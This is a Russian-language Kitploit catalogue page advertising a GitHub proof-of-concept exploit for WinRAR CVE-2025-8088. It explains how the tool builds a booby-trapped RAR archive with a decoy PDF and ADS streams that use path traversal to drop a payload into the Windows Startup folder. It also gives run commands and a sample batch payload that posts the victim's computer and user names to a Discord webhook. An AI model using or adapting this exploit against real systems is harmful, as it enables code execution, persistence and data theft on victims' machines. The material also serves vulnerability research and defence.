Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-8088-Exploit — PoC-эксплойт для уязвимости WinRAR (CVE-2025-8088), затрагивающей версии 7.12 и ниже. Этот инструмент создаёт вредоносный RAR-архив, который внедряет полезные нагрузки в альтернативные потоки данных (ADS) с использованием обхода пути (path traversal), что потенциально может привести к выполнению произвольного кода. | Kitploit
Инструменты/GitHubGitHub/techcorp/cve-2025-8088-exploit
Генерация полезной нагрузкиЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingЭксплуатация Бинарных Файлов
GitHubtechcorp/cve-2025-8088-exploit

CVE-2025-8088-Exploit

Репозиторий
210 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

PoC-эксплойт для уязвимости WinRAR (CVE-2025-8088), затрагивающей версии 7.12 и ниже. Этот инструмент создаёт вредоносный RAR-архив, который внедряет полезные нагрузки в альтернативные потоки данных (ADS) с использованием обхода пути (path traversal), что потенциально может привести к выполнению произвольного кода.

Поделиться

CVE-2025-8088 Эксплойт WinRAR 🔓

Эксплойт proof-of-concept для уязвимости WinRAR (CVE-2025-8088), затрагивающей версии 7.12 и ниже. Этот инструмент создаёт вредоносный RAR-архив, который внедряет полезную нагрузку в альтернативные потоки данных (ADS) с обходом пути (path traversal), что потенциально может привести к выполнению произвольного кода.

  • Проблема многих других эксплойтов в том, что они не встраивают несколько потоков ADS, что требует либо удачи с правильным обходом пути, либо знания точного имени пользователя/каталога извлечения.

🚀 Как это работает

  1. Создаёт документ-приманку 📄 — генерирует профессионально выглядящий PDF (резюме или отчёт о пентесте)
  2. Встраивает несколько потоков ADS 🔄 — присоединяет потоки полезной нагрузки с разной глубиной обхода пути
  3. Изменяет заголовки RAR ⚙️ — модифицирует структуру архива для эксплуатации уязвимости обхода пути
  4. Сбрасывает полезную нагрузку в автозагрузку 📂 — при извлечении пытается записать полезную нагрузку в папку автозагрузки Windows

🛠️ Использование

root@kitploit:~
# Clone the repository
git clone https://github.com/techcorp/CVE-2025-8088-Exploit.git
cd best-CVE-2025-8088

# Install dependencies
pip install reportlab

# Run the exploit
python CVE-2025-8088.py

✏️ Настройка пейлоада

Измените пейлоад для вызова Discord webhook:

root@kitploit:~
# Replace the PAYLOAD variable in the script:
PAYLOAD = """@echo off
curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Extracted on %COMPUTERNAME% by %USERNAME%\"}" YOUR_DISCORD_WEBHOOK_URL
pause
"""

Замените YOUR_DISCORD_WEBHOOK_URL на ваш реальный URL вебхука.

🔄 Порядок выполнения

  1. Жертва извлекает RAR с помощью уязвимого WinRAR (≤7.12)
  2. Пейлоад записывается в папку автозагрузки:
    root@kitploit:~
    AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    
  3. При следующей перезагрузке ➡️ пейлоад выполняется автоматически

📋 Требования

  • Windows OS 🪟
  • Python 3.x 🐍
  • Установленный WinRAR
  • Библиотека ReportLab (pip install reportlab)
Скачать инструмент